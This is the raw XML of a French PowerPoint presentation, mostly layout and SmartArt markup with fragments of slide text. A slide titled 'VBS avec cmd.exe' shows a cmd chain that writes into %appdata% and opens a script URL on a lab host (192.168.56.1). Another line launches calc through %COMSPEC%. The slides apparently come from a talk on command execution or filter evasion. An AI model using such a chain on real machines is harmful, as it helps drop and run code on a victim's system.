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1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId31"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId32"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="338" r:id="rId2"/>
    <p:sldId id="374" r:id="rId3"/>
    <p:sldId id="511" r:id="rId4"/>
    <p:sldId id="377" r:id="rId5"/>
    <p:sldId id="510" r:id="rId6"/>
    <p:sldId id="509" r:id="rId7"/>
    <p:sldId id="521" r:id="rId8"/>
    <p:sldId id="522" r:id="rId9"/>
    <p:sldId id="523" r:id="rId10"/>
    <p:sldId id="524" r:id="rId11"/>
    <p:sldId id="525" r:id="rId12"/>
    <p:sldId id="526" r:id="rId13"/>
    <p:sldId id="527" r:id="rId14"/>
    <p:sldId id="528" r:id="rId15"/>
    <p:sldId id="529" r:id="rId16"/>
    <p:sldId id="530" r:id="rId17"/>
    <p:sldId id="531" r:id="rId18"/>
    <p:sldId id="376" r:id="rId19"/>
    <p:sldId id="533" r:id="rId20"/>
    <p:sldId id="532" r:id="rId21"/>
    <p:sldId id="375" r:id="rId22"/>
    <p:sldId id="513" r:id="rId23"/>
    <p:sldId id="537" r:id="rId24"/>
    <p:sldId id="423" r:id="rId25"/>
    <p:sldId id="512" r:id="rId26"/>
    <p:sldId id="514" r:id="rId27"/>
    <p:sldId id="534" r:id="rId28"/>
    <p:sldId id="535" r:id="rId29"/>
    <p:sldId id="5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4" autoAdjust="0"/>
    <p:restoredTop sz="84961" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="95" d="100"/>
          <a:sy n="95" d="100"/>
        </p:scale>
        <p:origin x="726" y="90"/>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192.168.56.1/VBscript.php"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192.168.56.1/VBscript.php"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fr-FR" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>VBS avec cmd.exe</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>copy%appdata</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>%&amp;&amp;echo2&gt;&gt;%</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>appdata</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>%&amp;&amp;%</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>appdata</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>% </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>start</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>http://192.168.56.1/VBscript.php</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1800" dirty="0" smtClean="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:endParaRPr lang="fr-FR" sz="1800" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>cmd.Exe</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1800" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>%COMSPEC%  /b /c  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>calc</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" dirty="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>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endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>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endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="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custLinFactNeighborX="-514" custLinFactNeighborY="-8645"/>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custScaleY="6701"/>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fr-FR" sz="2400" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>RegEx</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> :</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="24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endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>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endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="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custLinFactNeighborX="-514" custLinFactNeighborY="-8645"/>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custScaleY="6701"/>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fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="24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endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>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endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="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custLinFactNeighborX="-514" custLinFactNeighborY="-8645"/>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custScaleY="131044"/>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custScaleY="6701"/>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fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="24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endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>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endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="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custLinFactNeighborX="-514" custLinFactNeighborY="-8645"/>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custScaleY="131044"/>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custScaleY="6701"/>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fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="24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endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>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endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="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custLinFactNeighborX="-514" custLinFactNeighborY="-8645"/>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custScaleY="131044"/>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custScaleY="6701"/>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fr-FR" sz="2400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="24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endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr algn="l"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>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endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="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custLinFactNeighborX="-514" custLinFactNeighborY="-8645"/>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custScaleY="131044"/>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custScaleY="6701"/>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128"/>
          <a:ext cx="6175375"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128"/>
          <a:ext cx="6175375" cy="253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fr-FR" sz="1800" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>VBS avec cmd.exe</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="800100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1800" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>copy%appdata</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1800" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>%&amp;&amp;echo2&gt;&gt;%</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1800" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>appdata</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1800" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>%&amp;&amp;%</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1800" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>appdata</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1800" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>% </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1800" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>start</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1800" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1800" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>http://192.168.56.1/VBscript.php</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1800" kern="1200" dirty="0" smtClean="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="800100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:endParaRPr lang="fr-FR" sz="1800" kern="1200" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="800100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1800" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>cmd.Exe</a:t>
          </a:r>
          <a:endParaRPr lang="fr-FR" sz="1800" kern="1200" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="800100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>%COMSPEC%  /b /c  </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1600" kern="1200" dirty="0" err="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>calc</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2128"/>
        <a:ext cx="6175375" cy="2538542"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F1AF51EE-E3E4-7A4F-8716-70015E55D922}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2321214"/>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2540671"/>
          <a:ext cx="6175375" cy="253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b="1" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2540671"/>
        <a:ext cx="6175375" cy="2538542"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{453B5C1B-7479-A64C-A62F-F8FF11789102}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5079213"/>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5079213"/>
          <a:ext cx="6175375" cy="170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sz="1600" kern="1200" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="5079213"/>
        <a:ext cx="6175375" cy="1701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128"/>
          <a:ext cx="6175375"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128"/>
          <a:ext cx="6175375" cy="253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err="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>RegEx</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t> :</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2128"/>
        <a:ext cx="6175375" cy="2538542"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F1AF51EE-E3E4-7A4F-8716-70015E55D922}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2321214"/>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2540671"/>
          <a:ext cx="6175375" cy="253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smtClean="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2540671"/>
        <a:ext cx="6175375" cy="2538542"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{453B5C1B-7479-A64C-A62F-F8FF11789102}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5079213"/>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5079213"/>
          <a:ext cx="6175375" cy="170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sz="1600" kern="1200" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="5079213"/>
        <a:ext cx="6175375" cy="170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1293"/>
          <a:ext cx="6175375"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1293"/>
          <a:ext cx="6175375" cy="219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solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1293"/>
        <a:ext cx="6175375" cy="2193276"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F1AF51EE-E3E4-7A4F-8716-70015E55D922}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1946098"/>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2194569"/>
          <a:ext cx="6169344" cy="287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smtClean="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="1066800">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2194569"/>
        <a:ext cx="6169344" cy="2874156"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{453B5C1B-7479-A64C-A62F-F8FF11789102}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5068726"/>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5068726"/>
          <a:ext cx="6175375" cy="146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sz="1600" kern="1200" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="5068726"/>
        <a:ext cx="6175375" cy="1469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1293"/>
          <a:ext cx="6175375"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1293"/>
          <a:ext cx="6175375" cy="219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solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1293"/>
        <a:ext cx="6175375" cy="2193276"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F1AF51EE-E3E4-7A4F-8716-70015E55D922}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1946098"/>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2194569"/>
          <a:ext cx="6169344" cy="287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smtClean="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="1066800">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2194569"/>
        <a:ext cx="6169344" cy="2874156"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{453B5C1B-7479-A64C-A62F-F8FF11789102}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5068726"/>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5068726"/>
          <a:ext cx="6175375" cy="146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sz="1600" kern="1200" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="5068726"/>
        <a:ext cx="6175375" cy="1469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1293"/>
          <a:ext cx="6175375"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1293"/>
          <a:ext cx="6175375" cy="219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solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1293"/>
        <a:ext cx="6175375" cy="2193276"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F1AF51EE-E3E4-7A4F-8716-70015E55D922}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1946098"/>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2194569"/>
          <a:ext cx="6169344" cy="287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smtClean="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="1066800">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" b="1" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2194569"/>
        <a:ext cx="6169344" cy="2874156"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{453B5C1B-7479-A64C-A62F-F8FF11789102}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="5068726"/>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5068726"/>
          <a:ext cx="6175375" cy="146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sz="1600" kern="1200" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="5068726"/>
        <a:ext cx="6175375" cy="146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1293"/>
          <a:ext cx="6175375"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1293"/>
          <a:ext cx="6175375" cy="219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solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>
</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1293"/>
        <a:ext cx="6175375" cy="2193276"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F1AF51EE-E3E4-7A4F-8716-70015E55D922}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1946098"/>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2194569"/>
          <a:ext cx="6169344" cy="287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smtClean="0">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="1066800">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="2400" b="1" kern="1200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
